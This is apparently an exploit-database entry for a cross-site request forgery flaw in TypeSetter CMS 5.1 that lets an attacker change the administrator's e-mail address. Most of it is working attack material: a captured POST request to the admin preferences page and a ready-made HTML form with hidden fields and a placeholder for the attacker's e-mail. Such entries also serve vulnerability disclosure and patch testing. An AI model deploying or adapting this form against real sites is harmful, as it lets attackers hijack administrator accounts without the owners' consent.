# Exploit Title: TypeSetter 5.1 - CSRF (Change admin e-mail)
# Exploit Author: Alperen Ergel
# Software Homepage: https://www.typesettercms.com/
# Version : 5.1
# Tested on: Kali & ubuntu
# Category: WebApp
######## Description ########
Attacker can change admin e-mail address
## Vulnerable
- Go to the admin page view preferences
- Change the e-mail address
######## Proof of Concept ########
===> REQUEST <====
POST /typesetter/Admin/Preferences HTTP/1.1
Host: http://localhost/
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 237
Origin: http://localhost/
Connection: close
Referer: http://localhost/typesetter/Admin/Preferences
## < SNIPP >
verified=6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c
&email=demo%40mail.com&oldpassword=&password=&password1=&algo=password_hash&cmd=changeprefs&aaa=Save
#### Attack Code ####
<html>
<body>
<form action="http://localhost/typesetter/Admin/Preferences" method="POST">
<input type="hidden" name="verified" value="6cab21b263dafc079bc056b7e0f0610c37d1a5af46f252e24d537afa906baed776c370cb24709d8795842c0a86eb2d76e4300d529ebb5c0840fd5096c96c748c" />
<input type="hidden" name="email" value="[CHANGE HERE]" />
<input type="hidden" name="oldpassword" value="" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="password1" value="" />
<input type="hidden" name="algo" value="password_hash" />
<input type="hidden" name="cmd" value="changeprefs" />
<input type="hidden" name="aaa" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>